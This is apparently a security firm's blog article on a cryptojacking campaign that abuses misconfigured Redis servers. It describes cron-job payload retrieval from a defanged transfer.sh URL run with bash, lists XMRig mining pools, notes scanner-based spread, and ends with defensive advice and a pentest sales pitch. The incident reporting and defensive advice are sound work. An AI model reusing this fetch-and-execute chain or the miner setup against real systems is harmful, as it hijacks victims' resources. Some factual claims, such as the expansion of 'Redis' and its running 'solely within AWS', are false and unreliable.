Novel Cryptojacking Campaign Leverages Misconfigured Redis Database Servers

Databases are an indispensable part of modern applications. Whether a web app or a customer-facing mobile app, database servers store all customer data for the app to retrieve when required. Maximize Market Research predics that the NoSQL Database Market will reach US$36.50 billion by 2029. Redis database is a prominent open-source NoSQL in-memory database. It runs solely within AWS, holding a market share of 28 percent. 

Because of the increased demand for Redis databases, it has caught the attention of attackers. Cybercriminals are carrying out cryptojacking campaigns using misconfigured Redis databases. This article will discuss how misconfigured Redis database servers became a target of novel cryptojacking. It will also highlight the preventive measures enterprises can take to protect Redis databases.

What is the Redis Database?

The Remote Directory Server (Redis) is a NoSQL database server acting as an in-memory open-source data storage system. It follows the key-value pairs technique for storing the data, just like a HashMap in Java. It has a BSD license and leverages a message broker, cache, and streaming engine for database management.

The Redis database can run atomic operations on various data structures like hashes, lists, strings, HyperLogLogs, and bit arrays.

Cryptojacking Campaigns Performed Using Misconfigured Redis Databases

Cado Labs Security researchers recently discovered a novel cryptojacking campaign that targets insecure and misconfigured Redis database deployment. The attackers are leveraging transfer.sh, a legitimate and open-source command-line file transfer service, to carry out the cyberattack. 

Cado Labs says, "Underpinning this campaign was the use of Transfer.sh. It may be an attempt at evading detections based on other common code hosting domains (such as pastebin[.]com)." The cloud security firm also stressed, "The command line interactivity of Transfer.sh makes it a perfect candidate for hosting & delivery of malicious payloads."

In this attack chain, the attacker targets the insecure Redis deployments and then registers on the cron application, allowing attackers to perform arbitrary code execution when parsed by the scheduler. The attacker designs the job in a way that it retrieves a payload hosted at Transfer.sh. 

Security researchers also identified similar attack mechanisms where the cybercriminals like WatchDog and TeamTNT performed cryptojacking operations. In such attack mechanisms, the patterns remain identical. After gaining the initial access, they use a script as a payload that paves the way for an XMRig cryptocurrency miner. 

They recover the payload from a location like https://transfer[.]sh/QQcudu/tmp[.]fDGJW8BfMC. This file is saved as .cmd and executed with bash. A custom XMRig configuration is then written to disk, which registers the miner with the following mining pools:

• xmr.pool.gntl.co.uk

• pool.hashvault.pro

• xmr-eu1.nanopool.org

• monerohash.com

• pool.supportxmr.com

• ca.monero.herominers.com

• xmrpool.eu

• pool.xmrfast.com

• pool.xmr.pt

Redis Database Server Attack Reports

Although it is clear that this campaign aims to hijack system resources for mining cryptocurrency, infection by this malware could have unintended effects. Reckless configuration of Linux memory management systems could quite easily result in the corruption of data or the loss of system availability.

In recent months, security researchers witnessed Redis database servers experiencing multiple cyber threat strikes after Redigo (Go language-based Redis malware) and HeadCrab (elusive Redis database server threat) incidents.

Cado Security also highlighted, "As mentioned previously, the script retrieves the pnscan mass network scanning utility. This utility is often used for finding vulnerable Redis servers and propagating a copy of the script to them. This technique has been previously attributed to WatchDog. It uses an interesting combination of the Linux 'seq' and 'sort' commands to build up a list of IP addresses to target."

Preventive Measures Against Redis Database Server Attacks

• Security researchers recommend not exposing the Redis database to the internet. Also, they mandate to apply single or multiple authentication factors so that any hacking campaign cannot gain access to it straightway.

• It is a good practice not to store sensitive data in the Redis database. Also, reserving the data in plain text can be vulnerable to stealing. Therefore, developers can implement encryption mechanisms to prevent the data stored in the Redis database. Redis offers optional support for TLS on multiple communication channels.

• Enterprises that use Redis database servers must monitor them to protect them from getting infected. Checking the CPU consumption, memory usage, and crypto-mining malware activities will help.

• It is always best to run Redis with minimum privileges. It will narrow down the chances of potential damage.

• Another good practice is to run Redis version 4.x with "protected mode" on.

• Enterprises can also disallow specific command usage (when not required) like the "Redis CONFIG command" to prevent Redis database servers from getting compromised.

Conclusion 

The Redis database server is a robust NoSQL database to manage complex semi-structured and unstructured data. However, with increased usage, enterprises must revisit their security posture. Enterprises can seek expert guidance from cybersecurity firms to protect Redis databases from misconfiguration attacks.

Ready to take your organization's cybersecurity to the next level? Contact our team of ethical hackers today to uncover hard-to-find vulnerabilities via our 95% manual pentesting methodology.